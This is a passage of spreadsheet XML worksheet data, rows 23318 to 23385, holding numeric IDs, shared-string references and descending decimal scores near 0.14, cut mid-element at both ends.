        <v>22499</v>
      </c>
      <c r="D23318" s="2">
        <v>1.0</v>
      </c>
      <c r="E23318" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23318" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="23319" ht="15.75" customHeight="1">
      <c r="A23319" s="1">
        <v>24478.0</v>
      </c>
      <c r="B23319" s="2">
        <v>1.1033555E7</v>
      </c>
      <c r="C23319" s="2" t="s">
        <v>22500</v>
      </c>
      <c r="D23319" s="2">
        <v>1.0</v>
      </c>
      <c r="E23319" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23319" s="2">
        <v>0.1440677966101696</v>
      </c>
    </row>
    <row r="23320" ht="15.75" customHeight="1">
      <c r="A23320" s="1">
        <v>32182.0</v>
      </c>
      <c r="B23320" s="2">
        <v>5.466124E7</v>
      </c>
      <c r="C23320" s="2" t="s">
        <v>22501</v>
      </c>
      <c r="D23320" s="2">
        <v>1.0</v>
      </c>
      <c r="E23320" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23320" s="2">
        <v>0.1440677966101696</v>
      </c>
    </row>
    <row r="23321" ht="15.75" customHeight="1">
      <c r="A23321" s="1">
        <v>22342.0</v>
      </c>
      <c r="B23321" s="2">
        <v>3.4489362E7</v>
      </c>
      <c r="C23321" s="2" t="s">
        <v>22502</v>
      </c>
      <c r="D23321" s="2">
        <v>1.0</v>
      </c>
      <c r="E23321" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23321" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="23322" ht="15.75" customHeight="1">
      <c r="A23322" s="1">
        <v>24007.0</v>
      </c>
      <c r="B23322" s="2">
        <v>9281882.0</v>
      </c>
      <c r="C23322" s="2" t="s">
        <v>22391</v>
      </c>
      <c r="D23322" s="2">
        <v>1.0</v>
      </c>
      <c r="E23322" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23322" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="23323" ht="15.75" customHeight="1">
      <c r="A23323" s="1">
        <v>24718.0</v>
      </c>
      <c r="B23323" s="2">
        <v>1.169982E7</v>
      </c>
      <c r="C23323" s="2" t="s">
        <v>22503</v>
      </c>
      <c r="D23323" s="2">
        <v>1.0</v>
      </c>
      <c r="E23323" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23323" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="23324" ht="15.75" customHeight="1">
      <c r="A23324" s="1">
        <v>22740.0</v>
      </c>
      <c r="B23324" s="2">
        <v>4.4090178E7</v>
      </c>
      <c r="C23324" s="2" t="s">
        <v>22504</v>
      </c>
      <c r="D23324" s="2">
        <v>1.0</v>
      </c>
      <c r="E23324" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23324" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="23325" ht="15.75" customHeight="1">
      <c r="A23325" s="1">
        <v>29693.0</v>
      </c>
      <c r="B23325" s="2">
        <v>3.4203297E7</v>
      </c>
      <c r="C23325" s="2" t="s">
        <v>22505</v>
      </c>
      <c r="D23325" s="2">
        <v>1.0</v>
      </c>
      <c r="E23325" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23325" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="23326" ht="15.75" customHeight="1">
      <c r="A23326" s="1">
        <v>24851.0</v>
      </c>
      <c r="B23326" s="2">
        <v>1.2199268E7</v>
      </c>
      <c r="C23326" s="2" t="s">
        <v>22506</v>
      </c>
      <c r="D23326" s="2">
        <v>1.0</v>
      </c>
      <c r="E23326" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23326" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="23327" ht="15.75" customHeight="1">
      <c r="A23327" s="1">
        <v>28004.0</v>
      </c>
      <c r="B23327" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C23327" s="2" t="s">
        <v>22507</v>
      </c>
      <c r="D23327" s="2">
        <v>1.0</v>
      </c>
      <c r="E23327" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23327" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="23328" ht="15.75" customHeight="1">
      <c r="A23328" s="1">
        <v>28961.0</v>
      </c>
      <c r="B23328" s="2">
        <v>2.9794967E7</v>
      </c>
      <c r="C23328" s="2" t="s">
        <v>22508</v>
      </c>
      <c r="D23328" s="2">
        <v>1.0</v>
      </c>
      <c r="E23328" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23328" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="23329" ht="15.75" customHeight="1">
      <c r="A23329" s="1">
        <v>29329.0</v>
      </c>
      <c r="B23329" s="2">
        <v>3.1319521E7</v>
      </c>
      <c r="C23329" s="2" t="s">
        <v>22509</v>
      </c>
      <c r="D23329" s="2">
        <v>1.0</v>
      </c>
      <c r="E23329" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23329" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="23330" ht="15.75" customHeight="1">
      <c r="A23330" s="1">
        <v>31589.0</v>
      </c>
      <c r="B23330" s="2">
        <v>5128698.0</v>
      </c>
      <c r="C23330" s="2" t="s">
        <v>22510</v>
      </c>
      <c r="D23330" s="2">
        <v>1.0</v>
      </c>
      <c r="E23330" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23330" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="23331" ht="15.75" customHeight="1">
      <c r="A23331" s="1">
        <v>33254.0</v>
      </c>
      <c r="B23331" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C23331" s="2" t="s">
        <v>22511</v>
      </c>
      <c r="D23331" s="2">
        <v>1.0</v>
      </c>
      <c r="E23331" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23331" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="23332" ht="15.75" customHeight="1">
      <c r="A23332" s="1">
        <v>19523.0</v>
      </c>
      <c r="B23332" s="2">
        <v>5.5967281E7</v>
      </c>
      <c r="C23332" s="2" t="s">
        <v>22512</v>
      </c>
      <c r="D23332" s="2">
        <v>1.0</v>
      </c>
      <c r="E23332" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23332" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23333" ht="15.75" customHeight="1">
      <c r="A23333" s="1">
        <v>19777.0</v>
      </c>
      <c r="B23333" s="2">
        <v>5.6770457E7</v>
      </c>
      <c r="C23333" s="2" t="s">
        <v>22513</v>
      </c>
      <c r="D23333" s="2">
        <v>1.0</v>
      </c>
      <c r="E23333" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23333" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23334" ht="15.75" customHeight="1">
      <c r="A23334" s="1">
        <v>20933.0</v>
      </c>
      <c r="B23334" s="2">
        <v>1.6428611E7</v>
      </c>
      <c r="C23334" s="2" t="s">
        <v>22514</v>
      </c>
      <c r="D23334" s="2">
        <v>1.0</v>
      </c>
      <c r="E23334" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23334" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23335" ht="15.75" customHeight="1">
      <c r="A23335" s="1">
        <v>31596.0</v>
      </c>
      <c r="B23335" s="2">
        <v>5131622.0</v>
      </c>
      <c r="C23335" s="2" t="s">
        <v>22515</v>
      </c>
      <c r="D23335" s="2">
        <v>1.0</v>
      </c>
      <c r="E23335" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23335" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23336" ht="15.75" customHeight="1">
      <c r="A23336" s="1">
        <v>32012.0</v>
      </c>
      <c r="B23336" s="2">
        <v>5.3480446E7</v>
      </c>
      <c r="C23336" s="2" t="s">
        <v>22516</v>
      </c>
      <c r="D23336" s="2">
        <v>1.0</v>
      </c>
      <c r="E23336" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23336" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23337" ht="15.75" customHeight="1">
      <c r="A23337" s="1">
        <v>32749.0</v>
      </c>
      <c r="B23337" s="2">
        <v>6049107.0</v>
      </c>
      <c r="C23337" s="2" t="s">
        <v>22517</v>
      </c>
      <c r="D23337" s="2">
        <v>1.0</v>
      </c>
      <c r="E23337" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23337" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="23338" ht="15.75" customHeight="1">
      <c r="A23338" s="1">
        <v>20256.0</v>
      </c>
      <c r="B23338" s="2">
        <v>1.1033556E7</v>
      </c>
      <c r="C23338" s="2" t="s">
        <v>22518</v>
      </c>
      <c r="D23338" s="2">
        <v>1.0</v>
      </c>
      <c r="E23338" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23338" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23339" ht="15.75" customHeight="1">
      <c r="A23339" s="1">
        <v>20554.0</v>
      </c>
      <c r="B23339" s="2">
        <v>1.3388907E7</v>
      </c>
      <c r="C23339" s="2" t="s">
        <v>22519</v>
      </c>
      <c r="D23339" s="2">
        <v>1.0</v>
      </c>
      <c r="E23339" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23339" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23340" ht="15.75" customHeight="1">
      <c r="A23340" s="1">
        <v>20787.0</v>
      </c>
      <c r="B23340" s="2">
        <v>1.5142496E7</v>
      </c>
      <c r="C23340" s="2" t="s">
        <v>22520</v>
      </c>
      <c r="D23340" s="2">
        <v>1.0</v>
      </c>
      <c r="E23340" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23340" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23341" ht="15.75" customHeight="1">
      <c r="A23341" s="1">
        <v>20905.0</v>
      </c>
      <c r="B23341" s="2">
        <v>1.6275906E7</v>
      </c>
      <c r="C23341" s="2" t="s">
        <v>22521</v>
      </c>
      <c r="D23341" s="2">
        <v>1.0</v>
      </c>
      <c r="E23341" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23341" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23342" ht="15.75" customHeight="1">
      <c r="A23342" s="1">
        <v>25916.0</v>
      </c>
      <c r="B23342" s="2">
        <v>1.5142495E7</v>
      </c>
      <c r="C23342" s="2" t="s">
        <v>22520</v>
      </c>
      <c r="D23342" s="2">
        <v>1.0</v>
      </c>
      <c r="E23342" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23342" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23343" ht="15.75" customHeight="1">
      <c r="A23343" s="1">
        <v>26204.0</v>
      </c>
      <c r="B23343" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C23343" s="2" t="s">
        <v>22522</v>
      </c>
      <c r="D23343" s="2">
        <v>1.0</v>
      </c>
      <c r="E23343" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23343" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23344" ht="15.75" customHeight="1">
      <c r="A23344" s="1">
        <v>26550.0</v>
      </c>
      <c r="B23344" s="2">
        <v>1.7783793E7</v>
      </c>
      <c r="C23344" s="2" t="s">
        <v>22523</v>
      </c>
      <c r="D23344" s="2">
        <v>1.0</v>
      </c>
      <c r="E23344" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23344" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23345" ht="15.75" customHeight="1">
      <c r="A23345" s="1">
        <v>30438.0</v>
      </c>
      <c r="B23345" s="2">
        <v>3.9098986E7</v>
      </c>
      <c r="C23345" s="2" t="s">
        <v>22392</v>
      </c>
      <c r="D23345" s="2">
        <v>1.0</v>
      </c>
      <c r="E23345" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23345" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23346" ht="15.75" customHeight="1">
      <c r="A23346" s="1">
        <v>30957.0</v>
      </c>
      <c r="B23346" s="2">
        <v>4742843.0</v>
      </c>
      <c r="C23346" s="2" t="s">
        <v>22524</v>
      </c>
      <c r="D23346" s="2">
        <v>1.0</v>
      </c>
      <c r="E23346" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23346" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23347" ht="15.75" customHeight="1">
      <c r="A23347" s="1">
        <v>30990.0</v>
      </c>
      <c r="B23347" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C23347" s="2" t="s">
        <v>22525</v>
      </c>
      <c r="D23347" s="2">
        <v>1.0</v>
      </c>
      <c r="E23347" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23347" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23348" ht="15.75" customHeight="1">
      <c r="A23348" s="1">
        <v>32625.0</v>
      </c>
      <c r="B23348" s="2">
        <v>5840301.0</v>
      </c>
      <c r="C23348" s="2" t="s">
        <v>22526</v>
      </c>
      <c r="D23348" s="2">
        <v>1.0</v>
      </c>
      <c r="E23348" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23348" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23349" ht="15.75" customHeight="1">
      <c r="A23349" s="1">
        <v>32750.0</v>
      </c>
      <c r="B23349" s="2">
        <v>6049117.0</v>
      </c>
      <c r="C23349" s="2" t="s">
        <v>22517</v>
      </c>
      <c r="D23349" s="2">
        <v>1.0</v>
      </c>
      <c r="E23349" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23349" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="23350" ht="15.75" customHeight="1">
      <c r="A23350" s="1">
        <v>24720.0</v>
      </c>
      <c r="B23350" s="2">
        <v>1.1701083E7</v>
      </c>
      <c r="C23350" s="2" t="s">
        <v>22527</v>
      </c>
      <c r="D23350" s="2">
        <v>1.0</v>
      </c>
      <c r="E23350" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23350" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="23351" ht="15.75" customHeight="1">
      <c r="A23351" s="1">
        <v>27949.0</v>
      </c>
      <c r="B23351" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C23351" s="2" t="s">
        <v>22528</v>
      </c>
      <c r="D23351" s="2">
        <v>1.0</v>
      </c>
      <c r="E23351" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23351" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="23352" ht="15.75" customHeight="1">
      <c r="A23352" s="1">
        <v>29314.0</v>
      </c>
      <c r="B23352" s="2">
        <v>3.1293794E7</v>
      </c>
      <c r="C23352" s="2" t="s">
        <v>22529</v>
      </c>
      <c r="D23352" s="2">
        <v>1.0</v>
      </c>
      <c r="E23352" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23352" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="23353" ht="15.75" customHeight="1">
      <c r="A23353" s="1">
        <v>30975.0</v>
      </c>
      <c r="B23353" s="2">
        <v>4.7493569E7</v>
      </c>
      <c r="C23353" s="2" t="s">
        <v>22530</v>
      </c>
      <c r="D23353" s="2">
        <v>1.0</v>
      </c>
      <c r="E23353" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23353" s="2">
        <v>0.1431924882629108</v>
      </c>
    </row>
    <row r="23354" ht="15.75" customHeight="1">
      <c r="A23354" s="1">
        <v>27573.0</v>
      </c>
      <c r="B23354" s="2">
        <v>2.2435758E7</v>
      </c>
      <c r="C23354" s="2" t="s">
        <v>22531</v>
      </c>
      <c r="D23354" s="2">
        <v>1.0</v>
      </c>
      <c r="E23354" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23354" s="2">
        <v>0.1427203065134101</v>
      </c>
    </row>
    <row r="23355" ht="15.75" customHeight="1">
      <c r="A23355" s="1">
        <v>28954.0</v>
      </c>
      <c r="B23355" s="2">
        <v>2.9720701E7</v>
      </c>
      <c r="C23355" s="2" t="s">
        <v>22532</v>
      </c>
      <c r="D23355" s="2">
        <v>1.0</v>
      </c>
      <c r="E23355" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23355" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="23356" ht="15.75" customHeight="1">
      <c r="A23356" s="1">
        <v>24335.0</v>
      </c>
      <c r="B23356" s="2">
        <v>1.0676404E7</v>
      </c>
      <c r="C23356" s="2" t="s">
        <v>22533</v>
      </c>
      <c r="D23356" s="2">
        <v>1.0</v>
      </c>
      <c r="E23356" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23356" s="2">
        <v>0.1425438596491229</v>
      </c>
    </row>
    <row r="23357" ht="15.75" customHeight="1">
      <c r="A23357" s="1">
        <v>25262.0</v>
      </c>
      <c r="B23357" s="2">
        <v>1.3388906E7</v>
      </c>
      <c r="C23357" s="2" t="s">
        <v>22534</v>
      </c>
      <c r="D23357" s="2">
        <v>1.0</v>
      </c>
      <c r="E23357" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23357" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="23358" ht="15.75" customHeight="1">
      <c r="A23358" s="1">
        <v>26727.0</v>
      </c>
      <c r="B23358" s="2">
        <v>1.8263342E7</v>
      </c>
      <c r="C23358" s="2" t="s">
        <v>22535</v>
      </c>
      <c r="D23358" s="2">
        <v>1.0</v>
      </c>
      <c r="E23358" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23358" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="23359" ht="15.75" customHeight="1">
      <c r="A23359" s="1">
        <v>25348.0</v>
      </c>
      <c r="B23359" s="2">
        <v>1.3551508E7</v>
      </c>
      <c r="C23359" s="2" t="s">
        <v>22536</v>
      </c>
      <c r="D23359" s="2">
        <v>1.0</v>
      </c>
      <c r="E23359" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23359" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="23360" ht="15.75" customHeight="1">
      <c r="A23360" s="1">
        <v>23872.0</v>
      </c>
      <c r="B23360" s="2">
        <v>8343569.0</v>
      </c>
      <c r="C23360" s="2" t="s">
        <v>22537</v>
      </c>
      <c r="D23360" s="2">
        <v>1.0</v>
      </c>
      <c r="E23360" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23360" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="23361" ht="15.75" customHeight="1">
      <c r="A23361" s="1">
        <v>32314.0</v>
      </c>
      <c r="B23361" s="2">
        <v>5.573158E7</v>
      </c>
      <c r="C23361" s="2" t="s">
        <v>22538</v>
      </c>
      <c r="D23361" s="2">
        <v>1.0</v>
      </c>
      <c r="E23361" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23361" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="23362" ht="15.75" customHeight="1">
      <c r="A23362" s="1">
        <v>21267.0</v>
      </c>
      <c r="B23362" s="2">
        <v>2.0065396E7</v>
      </c>
      <c r="C23362" s="2" t="s">
        <v>22539</v>
      </c>
      <c r="D23362" s="2">
        <v>1.0</v>
      </c>
      <c r="E23362" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23362" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="23363" ht="15.75" customHeight="1">
      <c r="A23363" s="1">
        <v>21312.0</v>
      </c>
      <c r="B23363" s="2">
        <v>2.0809487E7</v>
      </c>
      <c r="C23363" s="2" t="s">
        <v>22540</v>
      </c>
      <c r="D23363" s="2">
        <v>1.0</v>
      </c>
      <c r="E23363" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23363" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="23364" ht="15.75" customHeight="1">
      <c r="A23364" s="1">
        <v>21594.0</v>
      </c>
      <c r="B23364" s="2">
        <v>2.4003206E7</v>
      </c>
      <c r="C23364" s="2" t="s">
        <v>22541</v>
      </c>
      <c r="D23364" s="2">
        <v>1.0</v>
      </c>
      <c r="E23364" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23364" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="23365" ht="15.75" customHeight="1">
      <c r="A23365" s="1">
        <v>24934.0</v>
      </c>
      <c r="B23365" s="2">
        <v>1.2457637E7</v>
      </c>
      <c r="C23365" s="2" t="s">
        <v>22387</v>
      </c>
      <c r="D23365" s="2">
        <v>1.0</v>
      </c>
      <c r="E23365" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23365" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="23366" ht="15.75" customHeight="1">
      <c r="A23366" s="1">
        <v>24182.0</v>
      </c>
      <c r="B23366" s="2">
        <v>1.0255798E7</v>
      </c>
      <c r="C23366" s="2" t="s">
        <v>22489</v>
      </c>
      <c r="D23366" s="2">
        <v>1.0</v>
      </c>
      <c r="E23366" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23366" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="23367" ht="15.75" customHeight="1">
      <c r="A23367" s="1">
        <v>31831.0</v>
      </c>
      <c r="B23367" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C23367" s="2" t="s">
        <v>22542</v>
      </c>
      <c r="D23367" s="2">
        <v>1.0</v>
      </c>
      <c r="E23367" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23367" s="2">
        <v>0.1416275430359938</v>
      </c>
    </row>
    <row r="23368" ht="15.75" customHeight="1">
      <c r="A23368" s="1">
        <v>20646.0</v>
      </c>
      <c r="B23368" s="2">
        <v>1.4254501E7</v>
      </c>
      <c r="C23368" s="2" t="s">
        <v>22543</v>
      </c>
      <c r="D23368" s="2">
        <v>1.0</v>
      </c>
      <c r="E23368" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23368" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="23369" ht="15.75" customHeight="1">
      <c r="A23369" s="1">
        <v>22594.0</v>
      </c>
      <c r="B23369" s="2">
        <v>3933491.0</v>
      </c>
      <c r="C23369" s="2" t="s">
        <v>22544</v>
      </c>
      <c r="D23369" s="2">
        <v>1.0</v>
      </c>
      <c r="E23369" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23369" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="23370" ht="15.75" customHeight="1">
      <c r="A23370" s="1">
        <v>27947.0</v>
      </c>
      <c r="B23370" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C23370" s="2" t="s">
        <v>22545</v>
      </c>
      <c r="D23370" s="2">
        <v>1.0</v>
      </c>
      <c r="E23370" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23370" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="23371" ht="15.75" customHeight="1">
      <c r="A23371" s="1">
        <v>34071.0</v>
      </c>
      <c r="B23371" s="2">
        <v>9652154.0</v>
      </c>
      <c r="C23371" s="2" t="s">
        <v>22546</v>
      </c>
      <c r="D23371" s="2">
        <v>1.0</v>
      </c>
      <c r="E23371" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23371" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="23372" ht="15.75" customHeight="1">
      <c r="A23372" s="1">
        <v>11778.0</v>
      </c>
      <c r="B23372" s="2">
        <v>2.4284861E7</v>
      </c>
      <c r="C23372" s="2" t="s">
        <v>22547</v>
      </c>
      <c r="D23372" s="2">
        <v>1.0</v>
      </c>
      <c r="E23372" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23372" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="23373" ht="15.75" customHeight="1">
      <c r="A23373" s="1">
        <v>16623.0</v>
      </c>
      <c r="B23373" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C23373" s="2" t="s">
        <v>22548</v>
      </c>
      <c r="D23373" s="2">
        <v>1.0</v>
      </c>
      <c r="E23373" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23373" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="23374" ht="15.75" customHeight="1">
      <c r="A23374" s="1">
        <v>31767.0</v>
      </c>
      <c r="B23374" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C23374" s="2" t="s">
        <v>22549</v>
      </c>
      <c r="D23374" s="2">
        <v>1.0</v>
      </c>
      <c r="E23374" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23374" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="23375" ht="15.75" customHeight="1">
      <c r="A23375" s="1">
        <v>33904.0</v>
      </c>
      <c r="B23375" s="2">
        <v>9215150.0</v>
      </c>
      <c r="C23375" s="2" t="s">
        <v>22550</v>
      </c>
      <c r="D23375" s="2">
        <v>1.0</v>
      </c>
      <c r="E23375" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23375" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="23376" ht="15.75" customHeight="1">
      <c r="A23376" s="1">
        <v>898.0</v>
      </c>
      <c r="B23376" s="2">
        <v>2.2099256E7</v>
      </c>
      <c r="C23376" s="2" t="s">
        <v>22551</v>
      </c>
      <c r="D23376" s="2">
        <v>1.0</v>
      </c>
      <c r="E23376" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23376" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23377" ht="15.75" customHeight="1">
      <c r="A23377" s="1">
        <v>10795.0</v>
      </c>
      <c r="B23377" s="2">
        <v>1.5734323E7</v>
      </c>
      <c r="C23377" s="2" t="s">
        <v>22552</v>
      </c>
      <c r="D23377" s="2">
        <v>1.0</v>
      </c>
      <c r="E23377" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23377" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23378" ht="15.75" customHeight="1">
      <c r="A23378" s="1">
        <v>12872.0</v>
      </c>
      <c r="B23378" s="2">
        <v>3.1926407E7</v>
      </c>
      <c r="C23378" s="2" t="s">
        <v>22553</v>
      </c>
      <c r="D23378" s="2">
        <v>1.0</v>
      </c>
      <c r="E23378" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23378" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23379" ht="15.75" customHeight="1">
      <c r="A23379" s="1">
        <v>20284.0</v>
      </c>
      <c r="B23379" s="2">
        <v>1.1184401E7</v>
      </c>
      <c r="C23379" s="2" t="s">
        <v>22554</v>
      </c>
      <c r="D23379" s="2">
        <v>1.0</v>
      </c>
      <c r="E23379" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23379" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23380" ht="15.75" customHeight="1">
      <c r="A23380" s="1">
        <v>20558.0</v>
      </c>
      <c r="B23380" s="2">
        <v>1.339486E7</v>
      </c>
      <c r="C23380" s="2" t="s">
        <v>22555</v>
      </c>
      <c r="D23380" s="2">
        <v>1.0</v>
      </c>
      <c r="E23380" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23380" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23381" ht="15.75" customHeight="1">
      <c r="A23381" s="1">
        <v>21981.0</v>
      </c>
      <c r="B23381" s="2">
        <v>2.9391141E7</v>
      </c>
      <c r="C23381" s="2" t="s">
        <v>22556</v>
      </c>
      <c r="D23381" s="2">
        <v>1.0</v>
      </c>
      <c r="E23381" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23381" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23382" ht="15.75" customHeight="1">
      <c r="A23382" s="1">
        <v>21996.0</v>
      </c>
      <c r="B23382" s="2">
        <v>2.954578E7</v>
      </c>
      <c r="C23382" s="2" t="s">
        <v>22557</v>
      </c>
      <c r="D23382" s="2">
        <v>1.0</v>
      </c>
      <c r="E23382" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23382" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23383" ht="15.75" customHeight="1">
      <c r="A23383" s="1">
        <v>22694.0</v>
      </c>
      <c r="B23383" s="2">
        <v>4235939.0</v>
      </c>
      <c r="C23383" s="2" t="s">
        <v>22558</v>
      </c>
      <c r="D23383" s="2">
        <v>1.0</v>
      </c>
      <c r="E23383" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23383" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23384" ht="15.75" customHeight="1">
      <c r="A23384" s="1">
        <v>23698.0</v>
      </c>
      <c r="B23384" s="2">
        <v>7077982.0</v>
      </c>
      <c r="C23384" s="2" t="s">
        <v>22559</v>
      </c>
      <c r="D23384" s="2">
        <v>1.0</v>
      </c>
      <c r="E23384" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23384" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23385" ht="15.75" customHeight="1">
      <c r="A23385" s="1">
        <v>24678.0</v>
      </c>
      <c r="B23385" s="2">
        <v>1.1584825E7</v>
      </c>
      <c r="C23385" s="2" t="s">
        <v>22560</v>
      </c>
      <c r="D23385" s="2">
